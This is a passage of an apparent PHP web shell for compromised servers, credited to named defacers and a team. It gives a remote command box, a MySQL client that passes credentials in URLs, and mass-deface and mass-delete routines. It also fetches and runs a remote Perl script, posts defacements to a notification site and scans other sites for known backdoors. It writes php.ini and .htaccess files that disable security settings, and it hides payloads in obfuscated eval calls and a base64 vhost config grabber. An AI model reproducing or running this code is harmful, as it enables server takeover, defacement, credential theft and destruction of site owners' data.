@mysql_fetch_row($hasil)){$msg .= "<th>$column</th>";$kolum = $column;}$msg .= "</tr>";$hasil = @mysql_query("SELECT count(*) FROM ".$db.".".$table);
672. list($total) = mysql_fetch_row($hasil);
673. if(isset($_GET['z'])) $page = (int) $_GET['z'];
674. else $page = 1;$pagenum = 100;$totpage = ceil($total / $pagenum);$start = (($page - 1) * $pagenum);$hasil = @mysql_query("SELECT * FROM ".$db.".".$table." LIMIT ".$start.",".$pagenum);
675. while($datas = @mysql_fetch_assoc($hasil)){$msg .= "<tr>";foreach($datas as $data){if(trim($data) == "")
676. $data = "&nbsp;";$msg .= "<td>$data</td>";}$msg .= "</tr>";} $msg .= "</table>";$head = "<div style='padding:10px 0 0 6px;'> <form action='?' method='get'> <input type='hidden' name='y' value='".$dir."' /> <input type='hidden' name='x' value='mysql' /> <input type='hidden' name='sqlhost' value='".$sqlhost."' /> <input type='hidden' name='sqluser' value='".$sqluser."' /> <input type='hidden' name='sqlport' value='".$sqlport."' /> <input type='hidden' name='sqlpass' value='".$sqlpass."' /> <input type='hidden' name='db' value='".$db."' /> <input type='hidden' name='table' value='".$table."' /> Page <select class='inputz' name='z' onchange='this.form.submit();'>";
677. for($i = 1;$i <= $totpage;$i++){$head .= "<option value='".$i."'>".$i."</option>";
678. if($i == $_GET['z']) $head .= "<option value='".$i."' selected='selected'>".$i."</option>";} $head .= "</select><noscript><input class='inputzbut' type='submit' value='Go !' /></noscript></form></div>";$msg = $msgq.$head.$msg;}
679. elseif(isset($_GET['submitquery']) && ($_GET['sqlquery'] != "")){$db = $_GET['db'];$query = magicboom($_GET['sqlquery']);
680. $msg = "<div style='width:99%;padding:0 10px;'><form action='?' method='get'> <input type='hidden' name='y' value='".$dir."' /> <input type='hidden' name='x' value='mysql' /> <input type='hidden' name='sqlhost' value='".$sqlhost."' /> <input type='hidden' name='sqluser' value='".$sqluser."' /> <input type='hidden' name='sqlport' value='".$sqlport."' /> <input type='hidden' name='sqlpass' value='".$sqlpass."' /> <input type='hidden' name='db' value='".$db."' /> <p><textarea name='sqlquery' class='output' style='width:98%;height:80px;'>".$query."</textarea></p> <p><input class='inputzbut' style='width:80px;' name='submitquery' type='submit' value='Go !' /></p> </form></div> ";@mysql_select_db($db);$querys = explode(";",$query);foreach($querys as $query){if(trim($query) != ""){$hasil = mysql_query($query);
681. if($hasil){$msg .= "<p style='padding:0;margin:20px 6px 0 6px;'>".$query.";&nbsp;&nbsp;&nbsp;<span class='gaya'>[</span> ok <span class='gaya'>]</span></p>";$msg .= "<table class='explore' style='width:99%;'><tr>";
682. for($i=0;$i<@mysql_num_fields($hasil);$i++) $msg .= "<th>".htmlspecialchars(@mysql_field_name($hasil,$i))."</th>";$msg .= "</tr>";for($i=0;$i<@mysql_num_rows($hasil);$i++) {$rows=@mysql_fetch_array($hasil);$msg .= "<tr>";for($j=0;$j<@mysql_num_fields($hasil);$j++) {
683. if($rows[$j] == "") $dataz = "&nbsp;";
684. else $dataz = $rows[$j];$msg .= "<td>".$dataz."</td>";} $msg .= "</tr>";} $msg .= "</table>";}
685. else $msg .= "<p style='padding:0;margin:20px 6px 0 6px;'>".$query.";&nbsp;&nbsp;&nbsp;<span class='gaya'>[</span> error <span class='gaya'>]</span></p>";} } }
686. else {$query = "SHOW PROCESSLIST;\nSHOW VARIABLES;\nSHOW STATUS;";$msg = "<div style='width:99%;padding:0 10px;'><form action='?' method='get'> <input type='hidden' name='y' value='".$dir."' /><input type='hidden' name='x' value='mysql' /><input type='hidden' name='sqlhost' value='".$sqlhost."' /><input type='hidden' name='sqluser' value='".$sqluser."' /><input type='hidden' name='sqlport' value='".$sqlport."' /><input type='hidden' name='sqlpass' value='".$sqlpass."' /><input type='hidden' name='db' value='".$db."' /><p><textarea name='sqlquery' class='output' style='width:98%;height:80px;'>".$query."</textarea></p><p><input class='inputzbut' style='width:80px;' name='submitquery' type='submit' value='Go !' /></p></form></div> ";$dbs = array();$msg .= "<table class='explore' style='width:99%;'><tr><th>available databases</th></tr>";$hasil = @mysql_list_dbs($con);
687. while(list($db) = @mysql_fetch_row($hasil)){@array_push($dbs,$db);} @sort($dbs);foreach($dbs as $db){
688. $msg .= "<tr><td><a href='?bom&folder=".$dir."&amp;do=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$db."'>$db</a></td></tr>";} $msg .= "</table>";}
689. @mysql_close($con);} else $msg = "<p style='text-align:center;'>can't connect</p>";echo $msg;} else{?>
690. <br><center><h2 class="cgx2">MySQL Connect</h2><form action="?" method="get"><input type="hidden" name="y" value="<?php echo $dir;?>" /> <input type="hidden" name="x" value="mysql" /><table class="tabnet" style="width:300px;" align="center"> <tr><th colspan="2">Connection Form</th></tr> <tr><td>&nbsp;&nbsp;Host</td><td><input style="width:220px;" class="inputz" type="text" name="sqlhost" value="localhost" /></td></tr> <tr><td>&nbsp;&nbsp;Username</td><td><input style="width:220px;" class="inputz" type="text" name="sqluser" value="root" /></td></tr> <tr><td>&nbsp;&nbsp;Password</td><td><input style="width:220px;" class="inputz" type="text" name="sqlpass" value="password" /></td></tr> <tr><td>&nbsp;&nbsp;Port</td><td><input style="width:80px;" class="inputz" type="text" name="sqlport" value="3306" />&nbsp;<input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitsql" /></td></tr></table></form></center>
691. <?php }}
692. elseif($_GET['do'] == 'cmd') {?>
693. <form action="?bom&act=<?php echo $dir;?>&amp;do=cmd" method="post"> <table class="cmdbox"> <tr><td colspan="2">
694. <textarea class="output" readonly>
695. <?php if(isset($_POST['submitcmd'])) {echo @exe($_POST['cmd']);} ?>
696. </textarea> <tr><td colspan="2"><?php echo "$user&nbsp;>";?><input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:60%;" value="" /><input class="inputzbut" type="submit" value="Do !" name="submitcmd" style="width:12%;" /></td></tr> </table></form>
697. <?php } elseif($_GET['do'] == 'mass_deface') {
698. function sabun_massal($dir,$namafile,$isi_script) {
699. if(is_writable($dir)) {
700. $dira = scandir($dir);
701. foreach($dira as $dirb) {
702. $dirc = "$dir/$dirb";
703. $lokasi = $dirc.'/'.$namafile;
704. if($dirb === '.') {
705. file_put_contents($lokasi, $isi_script);
706. } elseif($dirb === '..') {
707. file_put_contents($lokasi, $isi_script);
708. } else {
709. if(is_dir($dirc)) {
710. if(is_writable($dirc)) {
711. echo "[<font color=lime>DONE</font>] $lokasi<br>";
712. file_put_contents($lokasi, $isi_script);
713. $idx = sabun_massal($dirc,$namafile,$isi_script);
714. }
715. }
716. }
717. }
718. }
719. }
720. function sabun_biasa($dir,$namafile,$isi_script) {
721. if(is_writable($dir)) {
722. $dira = scandir($dir);
723. foreach($dira as $dirb) {
724. $dirc = "$dir/$dirb";
725. $lokasi = $dirc.'/'.$namafile;
726. if($dirb === '.') {
727. file_put_contents($lokasi, $isi_script);
728. } elseif($dirb === '..') {
729. file_put_contents($lokasi, $isi_script);
730. } else {
731. if(is_dir($dirc)) {
732. if(is_writable($dirc)) {
733. echo "[<font color=lime>DONE</font>] $dirb/$namafile<br>";
734. file_put_contents($lokasi, $isi_script);
735. }
736. }
737. }
738. }
739. }
740. }
741. if($_POST['start']) {
742. if($_POST['tipe_sabun'] == 'mahal') {
743. echo "<div style='margin: 5px auto; padding: 5px'>";
744. sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
745. echo "</div>";
746. } elseif($_POST['tipe_sabun'] == 'murah') {
747. echo "<div style='margin: 5px auto; padding: 5px'>";
748. sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
749. echo "</div>";
750. }
751. } else {
752. echo "<center>";
753. echo "<form method='post'>
754. <font style='text-decoration: underline;'>Tipe Sabun:</font><br>
755. <input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>
756. <font style='text-decoration: underline;'>Folder:</font><br>
757. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
758. <font style='text-decoration: underline;'>Filename:</font><br>
759. <input type='text' name='d_file' value='0x.php' style='width: 450px;' height='10'><br>
760. <font style='text-decoration: underline;'>Index File:</font><br>
761. <textarea name='script' style='width: 450px; height: 200px;'>Hacked by FRU_403</textarea><br>
762. <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
763. </form></center>";
764. }
765. } elseif($_GET['do'] == 'mass_helper'){
766. echo "<center>";
767. echo "<span style=\"color:lime; font: 14px Comic Sans MS; font-weight:bold;\">Help :<br>1. After u get root, Upload ur deface source as index.txt <br>2. Run this comand on ur CMD / Terminal : <br></span><br/>";
768. echo "<help>&nbsp;&nbsp;&nbsp;&nbsp;<blink>=></blink><b> cat /etc/httpd/conf/httpd.conf | grep DocumentRoot>dir.txt </b></help><br/>";
769. echo "<help>&nbsp;&nbsp;&nbsp;&nbsp;<blink>=></blink><b> cat /etc/httpd/conf/httpd.conf | grep ServerName>dmn.txt </b></help><br><br/><br/>";
770. echo "<form method=POST>
771. <help title='the file you want to put in all sites'> Def page name : </help>
772. &nbsp;&nbsp;<input title='the file name you want to put in all sites' type=text name=index value=bie.htm>&nbsp;|
773. <help title='your deface page's source code'>Def source code :</help>
774. &nbsp;&nbsp;<input title='your index source code' type='text' name='source' value='index.txt'><br><br>
775. <help>List DocumentRoot from httpd.conf : </help><br>
776. <input type=text name=dirs size=\"40\">
777. <br><br>
778. <help>List ServerName from httpd.conf : </help><br>
779. <input type=text name=sites size=\"40\">
780. <br><br>
781. <center><input class='but' type=submit value='Generate ' name='go'></center>
782. </form>
783. <br/>";
784. echo "</center>";
785. if($_POST['go']){
786. echo "<b></b>";
787. $index = $_POST['index'];
788. $source = $_POST['source'];
789. $dirs =explode("\n",@dd1(file_get_contents($_POST['dirs'])));
790. $sites =explode("\n",@dd2(file_get_contents($_POST['sites'])));
791.  
792. // preparing perl script
793.  
794. if($_POST['dirs']){
795.  
796.  
797. $perl = fopen ('mass.txt','w+') or die (" WTF !! , i cannot create files o__O");
798. $perl_start = "#!/usr/bin/perl";
799. $perl_end = "print\"All Defaced !\";";
800. fwrite ($perl,$perl_start."\n\n"); // Write !!
801.  
802. foreach($dirs as $dir){
803.  
804. $result = "system(\"cat ".$source." > ".@kill($dir)."/".$index."\");";
805. fwrite ($perl, $result."\n");
806. flush();
807. }
808. echo "<tr><td><font style='font: 9pt Comic Sans MS; COLOR: #FFFFFF;font-weight:bold;'>perl script <a style='text-decoration: none;color:lime;' href='mass.txt'>mass.txt</a></font></td><td><br>";
809. echo "<help>Now run this mass.txt on ur CMD / Terminal <blink>=> </blink> perl mass.txt </help><br>";
810. fwrite ($perl, "\n".$perl_end);
811. fclose($perl);
812.  
813. }
814. // preparing sites list
815.  
816. if($_POST['sites']){
817.  
818.  
819. $sitess = fopen ('sites.txt','w+') or die ("WTF !! , i can't create files o__O");
820. $sitess_start = "http://";
821. $sitess_end = "/";
822. fwrite ($sitess,"");
823.  
824. foreach($sites as $site){
825.  
826. $result2 = $sitess_start.@kill($site).$sitess_end.$index;
827. fwrite ($sitess, $result2."\n");
828. flush();
829. }
830. echo "<br /><tr><td><help>Defaced sites : <a style='text-decoration: none;color:lime;' href='sites.txt'>sites.txt</a></help></td><td><br/><br/>";
831. fwrite ($sitess,"");
832. fclose($sitess);
833.  
834. }
835. }
836. function kill($value){ return str_replace(array("\n","\r"),"",$value); }
837. function dd1($value){ return str_replace(array("DocumentRoot"," "),"",$value); }
838. function dd2($value){ return str_replace(array("ServerName"," "),"",$value); }
839. echo "<br />";
840. echo "<div class='greetz'><center> Original script by <b>ReZK2LL</center><font></div>";
841.  
842. }elseif($_GET['do'] == 'lcf') {
843. mkdir('priv_lcf',0755);
844. chdir('priv_lcf');
845. $kokdosya = ".htaccess";
846. $dosya_adi = "$kokdosya";
847. $dosya = fopen ($dosya_adi , 'w') or die ("Error mas broo!!!");
848. $metin = "OPTIONS Indexes Includes ExecCGI FollowSymLinks \n AddType application/x-httpd-cgi .pl \n AddHandler cgi-script .pl \n AddHandler cgi-script .pl
849. \n \n Options \n DirectoryIndex seees.html \n RemoveHandler .php \n AddType application/octet-stream .php";
850. fwrite ( $dosya , $metin ) ;
851. fclose ($dosya);
852. $file = fopen("lcf.pl","w+");
853. $write = fwrite ($file ,file_get_contents("http://pastebin.com/raw/26jAL0sz"));
854. fclose($file);
855. chmod("lcf.pl",0755);
856. echo "<iframe src=LCF/lcf.pl width=97% height=100% frameborder=0></iframe>";
857. }elseif($_GET['do'] == 'defacerid') {
858. echo "<center><form method='post'>
859. <u>Defacer</u>: <br>
860. <input type='text' name='hekel' size='50' value'FRU_403'><br>
861. <u>Team</u>: <br>
862. <input type='text' name='tim' size='50' value='Storm Cyber Army'><br>
863. <u>Domains</u>: <br>
864. <textarea style='width: 450px; height: 150px;' name='sites'></textarea><br>
865. <input type='submit' name='go' value='Submit' style='width: 450px;'>
866. </form>";
867. $site = explode("\r\n", $_POST['sites']);
868. $go = $_POST['go'];
869. $hekel = $_POST['hekel'];
870. $tim = $_POST['tim'];
871. if($go) {
872. foreach($site as $sites) {
873. $zh = $sites;
874. $form_url = "https://www.defacer.id/notify";
875. $data_to_post = array();
876. $data_to_post['attacker'] = "$hekel";
877. $data_to_post['team'] = "$tim";
878. $data_to_post['poc'] = 'SQL Injection';
879. $data_to_post['url'] = "$zh";
880. $curl = curl_init();
881. curl_setopt($curl,CURLOPT_URL, $form_url);
882. curl_setopt($curl,CURLOPT_POST, sizeof($data_to_post));
883. curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"); //msnbot/1.0 (+http://search.msn.com/msnbot.htm)
884. curl_setopt($curl,CURLOPT_POSTFIELDS, $data_to_post);
885. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
886. curl_setopt($curl, CURLOPT_REFERER, 'https://defacer.id/notify.html');
887. $result = curl_exec($curl);
888. echo $result;
889. curl_close($curl);
890. echo "<br>";
891. }
892. }
893. }elseif($_GET['do'] == 'sc') {
894. eval(str_rot13(gzinflate(str_rot13(base64_decode(('vUddQtswFH2v1P9gLKQGKXjLJh4GesRA7bSXVmd1Dysosi3bASo3uakznIn/vut8kcJr2AtEq9jOOfeeeB9fVS0nZ5YC0yCj4WCWZkwSc1eY39Bclil02nHZDSUm1QV0uIrjErTlGY4FSvqGbZ6GB3okGCKcVsFll4FRgNVNnEEmhUiGlTYbYh3fKcH1OOXlUUxjYSyswJBaylE6nKTcqfnx8QmR/B4H03U2duNUs62s/wUTiSapM1chRCXbrXPI1RsB9bws9Gbgcju/My7xC9fII5fcbj4M78uO6NljkCesKpTsQMdefSwBBTMFZMozCA61BRRsUf4MBwSfUAsGWEhxXjPqTAc7eENXG51rEOpFTQYtej29DcnnkHzqkAJOwlXMh/xKZCxhOALgTjivc2c6CpGyHvn10e0ezBeO0HeMdppCUkGCQc2cfJxBu0Uq5l2hCs2lJ8bL1eLbd7Gmi9Wvi6+r+PvV1W9W20AV+mqSJQ6xtDrKRtLIJbQP2vJ58xrTh2tEB0MKvekK3kbln/PSFC6gwjiV5OYRjs9qfsUbiYaNkrBBadQL/dQTZS8LDcnCC2GFjgkdDvbU5hY/51wAC6g1CjPoB40ZqKH9uGwVLEBr+Bw4JGu2DpndykSfA/VyUAx0uwivGtPe6lzOryUAi37whHLei1mjJRsY+UBzhksJOZqWouCeZ2JqI9Fq82vrDHuMXnyfWqr7TyZEW+ITAafghQlBXpjgep2YJXqyNGfM4vnkp2IgzDiyBGwHkqykURcdvFQ1e/797zNJphTGvschWMiiL1yT9zjm4QB//pgLpUAHh/HlxfLrbUdqTnkUvf6F7U71TYrfK6y2IWCGrq00hKqBbYaR0nmCtmnsoGBFi8aqIxpIx95mSXK8qocdYFCgry/5G12XSST6j4vdvJpdrzah3fslOEOm6LbYYs7TXw=='))))));
895. }elseif($_GET['do'] == 'lh'){
896. eval(str_rot13(gzinflate(str_rot13(base64_decode(("tUl7YtpVEP87VXyHiZMr0BLsPJqqgJ14QyBquuNrXEUlEExeeL2E5hZ7wS5pmu9+s7ZWgDM5RCmWJXt0f7Pz3JnJ52lphOsTQ+odbjFOjaGl1CCfWIlGTyPgLguIpQ+VoQKRYD7x8N8mDhsqC/iZRJ9DoxtDqNYDyx4xYA+20BUmvjEF7mw4wlL9WZ8J5o69b6lpcyhg8Qipju+aXkAVo35z+/az5KVGhoozmlEBilhLltbJyVCl6WULvpDx7kNE11lDpQ14NJsKY9hQKEyligc8DHNJFU8xcrXUKgRGV6hWhVooC6xMRCshRH2fz31OLQCfKtyQGVyNpOOg+DflE+hSPAhY+VyXsxRlZ6p3x+qRaWsK2sfqx3B13OZmN4E1QrZ9xuyqqkG5KyaEzCsuidTJdfbJEWEGzOYOE5PAim4j1fEJ/eSOSz7XHm5cqFE2n3bv1XwO4jeYFvfNxmyzNSgkrivclR7zuenIilALjFRpEM65SNzHY2A0nGubQ8Fdv+igZpH2sgfcAblAO6Vpj8lUPkUQYezqhVcB3r2DxaJFKL2AlvDykRjQbmRtpXt90eu0zi/+MJu9U/uijb8VuUxbclBEsBs45k+zkpS3K6iYBVLFaBylnOgI0hRL5Y3FQXRZfmiYBqEwMTNal2AkLeYk59Uya4KEVgfxLZhvd2PP9Djjmxm+i3WCbKyD0jm/ely2bV0lC8ZrMI/PSC4dTjskikOPWSQKiiRBlYk2KBQLancWQQZPKjtVNbgbxDLisK9w5ZNcjAFea4uBWE9P9T1a6/e7mtFxb8YtIi+SxYw7S8EcHX4+7R8bVxyhipKCcTHI0urpvyS8ijMz4sz1Wh6GxcLeoH3wp2nwmR/8RjF/+WNj9+FKVsElEitlvUooy9iV913ikmym133XiZ2pQbgjQUJZQrjEE5mO2peRjLGrIc0EvygbVDwqA/c8J+SOLzB2Q6kSJp0MzIZnS+ZUHcuQxS8P5vT/2KW2meKRHbey2DEnkutEuHe1GtDBZRMI6HD2F8rxaCjBjx+QTxpKDfidRgsLX/VsOyt7Mm/6IohStil49uKEetKv3+73D0KMWDsk3BP0jfIvrUvo8YG21e3o94+7mnP8FXTYGyqXptOW2vVBNe2kdNwiZh+r/Ns6D/N6WPV+vrTAT8slKBWe8WvLrREPoeMLav70RqakveP7ZuvYcdErllZIvvJ77rg0sNlJhj1PnYNCxUdCm/1rPK6MLByKKpbARIhG7ES6OQm5NTdvM7826yo34HbLiMVo85WApX0fXpBkw5+LB9CNtD7hkLPex0rFQBHbKs5S5j2nxQVCGfrXN63ehflb++a622H1zN56+/qm9OpMGzw9o09LDyIMydh1CsuTqb6lvxOKR6yiefbiK97cQF4lre4/idARGdaujmDr5XvpxPQXP/guZC3mu3GcxgGvFiMWRjD2jvXBa3biz+dp/gU="))))));
897. }elseif($_GET['do'] == 'sf') {
898. echo'<center><h2>Shell Finder</h2>
899. <form action="" method="post">
900. <input type="text" size="50" name="traget" value="http://www.site.com/"/>
901. <br>
902. <input name="scan" value="Start Scaning" style="width: 215px;" type="submit">
903. </form><br>';
904. if (isset($_POST["scan"])) {
905. $url = $_POST['traget'];
906. echo "<br /><span class='start'>Scanning ".$url."<br /><br /></span>";
907. echo "Result :<br />";
908. $shells = array("WSO.php","dz.php","cpanel.php","cpn.php","sql.php","mysql.php","madspot.php","cp.php","cpbt.php","sYm.php",
909. "x.php","r99.php","lol.php","jo.php","wp.php","whmcs.php","shellz.php","d0main.php","d0mains.php","users.php",
910. "Cgishell.pl","killer.php","changeall.php","2.php","Sh3ll.php","dz0.php","dam.php","user.php","dom.php","whmcs.php",
911. "vb.zip","r00t.php","c99.php","gaza.php","1.php","wp.zip"."wp-content/plugins/disqus-comment-system/disqus.php",
912. "d0mains.php","wp-content/plugins/akismet/akismet.php","madspotshell.php","Sym.php","c22.php","c100.php",
913. "wp-content/plugins/akismet/admin.php#","wp-content/plugins/google-sitemap-generator/sitemap-core.php#",
914. "wp-content/plugins/akismet/widget.php#","Cpanel.php","zone-h.php","tmp/user.php","tmp/Sym.php","cp.php",
915. "tmp/madspotshell.php","tmp/root.php","tmp/whmcs.php","tmp/index.php","tmp/2.php","tmp/dz.php","tmp/cpn.php",
916. "tmp/changeall.php","tmp/Cgishell.pl","tmp/sql.php","tmp/admin.php","cliente/downloads/h4xor.php",
917. "whmcs/downloads/dz.php","L3b.php","d.php","tmp/d.php","tmp/L3b.php","wp-content/plugins/akismet/admin.php",
918. "templates/rhuk_milkyway/index.php","templates/beez/index.php","admin1.php","upload.php","up.php","vb.zip","vb.rar",
919. "admin2.asp","uploads.php","sa.php","sysadmins/","admin1/","administration/Sym.php","images/Sym.php",
920. "/r57.php","/wp-content/plugins/disqus-comment-system/disqus.php","/shell.php","/sa.php","/admin.php",
921. "/sa2.php","/2.php","/gaza.php","/up.php","/upload.php","/uploads.php","/templates/beez/index.php","shell.php","/amad.php",
922. "/t00.php","/dz.php","/site.rar","/Black.php","/site.tar.gz","/home.zip","/home.rar","/home.tar","/home.tar.gz",
923. "/forum.zip","/forum.rar","/forum.tar","/forum.tar.gz","/test.txt","/ftp.txt","/user.txt","/site.txt","/error_log","/error",
924. "/cpanel","/awstats","/site.sql","/vb.sql","/forum.sql","/backup.sql","/back.sql","/data.sql","wp.rar/",
925. "wp-content/plugins/disqus-comment-system/disqus.php","asp.aspx","/templates/beez/index.php","tmp/vaga.php",
926. "tmp/killer.php","whmcs.php","tmp/killer.php","tmp/domaine.pl","tmp/domaine.php","useradmin/",
927. "tmp/d0maine.php","d0maine.php","tmp/sql.php","tmp/dz1.php","dz1.php","forum.zip","Symlink.php","Symlink.pl",
928. "forum.rar","joomla.zip","joomla.rar","wp.php","buck.sql","sysadmin.php","images/c99.php", "xd.php", "c100.php",
929. "spy.aspx","xd.php","tmp/xd.php","sym/root/home/","billing/killer.php","tmp/upload.php","tmp/admin.php",
930. "Server.php","tmp/uploads.php","tmp/up.php","Server/","wp-admin/c99.php","tmp/priv8.php","priv8.php","cgi.pl/",
931. "tmp/cgi.pl","downloads/dom.php","templates/ja-helio-farsi/index.php","webadmin.html","admins.php",
932. "/wp-content/plugins/count-per-day/js/yc/d00.php", "admins/","admins.asp","admins.php","wp.zip","wso2.5.1","pasir.php","pasir2.php","up.php","cok.php","newfile.php","upl.php",".php","a.php","crot.php","kontol.php","hmei7.php","jembut.php","memek.php","tai.php","rabit.php","indoxploit.php","a.php","hemb.php","hack.php","galau.php","HsH.php","indoXploit.php","asu.php","wso.php","lol.php","idx.php","rabbit.php","1n73ction.php","k.php","mailer.php","mail.php","temp.php","c.php","d.php","IDB.php","indo.php","indonesia.php","semvak.php","ndasmu.php","cox.php","as.php","ad.php","aa.php","file.php","peju.php","asd.php","configs.php","ass.php","z.php");
933. foreach ($shells as $shell){
934. $headers = get_headers("$url$shell"); //
935. if (eregi('200', $headers[0])) {
936. echo "<a href='$url$shell'>$url$shell</a> <span class='found'>Selesai Ndan</span><br /><br/><br/>"; //
937. $dz = fopen('result.txt', 'a+');
938. $suck = "$url$shell";
939. fwrite($dz, $suck."\n");
940. }
941. }
942. echo "Shell [ <a href='./result.txt' target='_blank'>result.txt</a> ]</span>";
943. }
944. }elseif($_GET['do'] == 'mass_delete') {
945. function hapus_massal($dir,$namafile) {
946. if(is_writable($dir)) {
947. $dira = scandir($dir);
948. foreach($dira as $dirb) {
949. $dirc = "$dir/$dirb";
950. $lokasi = $dirc.'/'.$namafile;
951. if($dirb === '.') {
952. if(file_exists("$dir/$namafile")) {
953. unlink("$dir/$namafile");
954. }
955. } elseif($dirb === '..') {
956. if(file_exists("".dirname($dir)."/$namafile")) {
957. unlink("".dirname($dir)."/$namafile");
958. }
959. } else {
960. if(is_dir($dirc)) {
961. if(is_writable($dirc)) {
962. if(file_exists($lokasi)) {
963. echo "[<font color=lime>DELETED</font>] $lokasi<br>";
964. unlink($lokasi);
965. $idx = hapus_massal($dirc,$namafile);
966. }
967. }
968. }
969. }
970. }
971. }
972. }
973. if($_POST['start']) {
974. echo "<div style='margin: 5px auto; padding: 5px'>";
975. hapus_massal($_POST['d_dir'], $_POST['d_file']);
976. echo "</div>";
977. } else {
978. echo "<center>";
979. echo "<form method='post'>
980. <font style='text-decoration: underline;'>Folder:</font><br>
981. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
982. <font style='text-decoration: underline;'>Filename:</font><br>
983. <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
984. <input type='submit' name='start' value='Mass Delete' style='width: 450px;'>
985. </form></center>";
986. }
987. }elseif($_GET['do'] == 'bypass'){
988. echo "<center>";
989. echo "<form method=post><input type=submit name=ini value='php.ini' />&nbsp;<input type=submit name=htce value='.htaccess' /></form>";
990. if(isset($_POST['ini']))
991. {
992. $file = fopen("php.ini","w");
993. echo fwrite($file,"disable_functions=none
994. safe_mode = Off
995. ");
996. fclose($file);
997. echo "<a href='php.ini'>click here!</a>";
998. } if(isset($_POST['htce']))
999. {
1000. $file = fopen(".htaccess","w");
1001. echo fwrite($file,"<IfModule mod_security.c>
1002. SecFilterEngine Off
1003. SecFilterScanPOST Off
1004. </IfModule>
1005. ");
1006. fclose($file);
1007. echo "htaccess successfully created!";
1008. }
1009. echo"</center>";
1010. } elseif($_GET['do'] == 'convh')
1011. {
1012. @mkdir('priv_vhost', 0755);
1013. @chdir('priv_vhost');
1014. $elesem = ".htaccess";
1015. $elakab = "$elesem";
1016. $filhat = fopen ($elakab , 'w') or die ("Can't Write htaccess !");
1017. $htcont = "Options FollowSymLinks MultiViews Indexes ExecCGI
1018.  
1019. AddType application/x-httpd-cgi .ler
1020.  
1021. AddHandler cgi-script .ler
1022. AddHandler cgi-script .ler";
1023. fwrite ( $filhat , $htcont ) ;
1024. fclose ($filhat);
1025. $config = 'PHA+PGZvbnQgY29sb3I9ImdyZWVuIj5SZXN1bHQgMSA6IDxzdHJvbmc+IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluIHByaW50ICJDb250ZW50LXR5cGU6IHRleHQvaHRtbFxuXG4iOyBwcmludCc8IURPQ1RZUEUgaHRtbCBQVUJMSUMgIi0vL1czQy8vRFREIFhIVE1MIDEuMCBUcmFuc2l0aW9uYWwvL0VOIiAiaHR0cDovL3d3dy53My5vcmcvVFIveGh0bWwxL0RURC94aHRtbDEtdHJhbnNpdGlvbmFsLmR0ZCI+IDxodG1sIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIj4gIDxoZWFkPiA8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LUxhbmd1YWdlIiBjb250ZW50PSJlbi11cyIgLz4gPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1UeXBlIiBjb250ZW50PSJ0ZXh0L2h0bWw7IGNoYXJzZXQ9dXRmLTgiIC8+IDx0aXRsZT52SG9zdHMgQ29uZmlnIEdyYWJiZXI8L3RpdGxlPiA8c3R5bGUgdHlwZT0idGV4dC9jc3MiPiAubmV3U3R5bGUxIHsgIGZvbnQtZmFtaWx5OiB1YnVudHU7ICBmb250LXNpemU6IHgtbGFyZ2U7ICBjb2xvcjogd2hpdGU7ICBiYWNrZ3JvdW5kLWNvbG9yOiAjMTUxNTE1OyAgdGV4dC1hbGlnbjogY2VudGVyOyB9IDwvc3R5bGU+IDwvaGVhZD4gJzsgICBwcmludCAnIDxib2R5IGNsYXNzPSJuZXdTdHlsZTEiPiA8cD4uOiBDb2RlZCBieSBGYWxsYWcgR2Fzc3JpbmkgfCBSZWMwZGVkIGJ5IENvdXJhZ2V1eDwvcD4nOyBvcGVuZGlyKG15ICRkaXIgLCAiL3Zhci93d3cvdmhvc3RzLyIpOyBmb3JlYWNoKHNvcnQgcmVhZGRpciAkZGlyKSB7ICAgICBteSAkaXNEaXIgPSAwOyAgICAgJGlzRGlyID0gMSBpZiAtZCAkXzsgJHNpdGVzcyA9ICRfOyAgIHN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9pbmNsdWRlcy9jb25maWd1cmUucGhwJywkc2l0ZXNzLictc2hvcC50eHQnKTsgc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL29zL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLW9zLnR4dCcpOyBzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3Njb20vaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tLnR4dCcpOyBzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3Njb21tZXJjZS9pbmNsdWRlcy9jb25maWd1cmUucGhwJywkc2l0ZXNzLictb3Njb21tZXJjZS50eHQnKTsgc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL29zY29tbWVyY2VzL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1vc2NvbW1lcmNlcy50eHQnKTsgc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3AvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3AyLnR4dCcpOyBzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2hvcHBpbmcvaW5jbHVkZXMvY29uZmlndXJlLnBocC